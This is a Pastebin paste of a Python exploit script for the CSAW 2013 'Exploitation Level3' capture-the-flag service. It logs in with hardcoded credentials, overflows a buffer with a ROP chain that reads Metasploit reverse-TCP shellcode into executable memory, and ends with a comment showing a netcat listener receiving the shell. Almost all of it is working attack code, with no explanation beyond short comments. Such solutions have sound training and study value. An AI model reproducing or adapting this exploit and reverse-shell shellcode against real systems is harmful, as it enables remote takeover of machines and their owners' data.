Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- from struct import pack, unpack
- from socket import *
- import time
- p = lambda x : pack("<I", x)
- up = lambda x : unpack("<I", x)[0]
- HOST = "192.168.0.109"
- PORT = 34266
- # linux/x86/shell_reverse_tcp - 95 bytes
- # http://www.metasploit.com
- shellcode = ("\xd9\xcf\xd9\x74\x24\xf4\x5d\x33\xc9\xb1\x12\xba\x5c\xa8"
- "\x72\xf6\x83\xed\xfc\x31\x55\x13\x03\x09\xbb\x90\x03\x80"
- "\x60\xa3\x0f\xb1\xd5\x1f\xba\x37\x53\x7e\x8a\x51\xae\x01"
- "\x78\xc4\x80\x3d\xb2\x76\xa9\x38\xb5\x1e\xf6\xce\xb2\x16"
- "\x6e\x33\x3d\x89\x48\xba\xdc\x65\xf0\xec\x4f\xd6\x4e\x0f"
- "\xf9\x39\x7d\x90\xab\xd1\x51\xbe\x38\x49\xc6\xef\xdc\xe0"
- "\x78\x79\xc3\xa0\xd7\xf0\xe5\xf4\xd3\xcf\x66")
- freespace = 0x0804b000 # rwx
- recv = 0x08048890
- pr = 0x08048943
- offset = 0x41c
- print "[*] CSAW Exploitation Level3 Exploit" # by sweetchip
- s = socket(AF_INET,SOCK_STREAM)
- s.connect((HOST,PORT))
- print s.recv(4096)
- print s.recv(4096)
- s.send("csaw2013")
- print s.recv(4096)
- s.send("S1mplePWD")
- print s.recv(4096)
- s.send("-1")
- print s.recv(4096)
- time.sleep(1)
- payload = "A"*(0x41c+4) # ebp
- payload += p(recv) # rop_start
- payload += p(pr)
- payload += p(4)
- payload += p(freespace)
- payload += p(len(shellcode))
- payload += p(0)
- s.send(payload)
- s.send(shellcode)
- raw_input("\ngive me shell! > ")
- """
- C:\Users\Administrator>nc -lvp 12071
- listening on [any] 12071 ...
- 192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
- connect to [192.168.0.93] from (UNKNOWN) [192.168.0.1] 51765: NO_DATA
- whoami
- sweetchip
- """
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement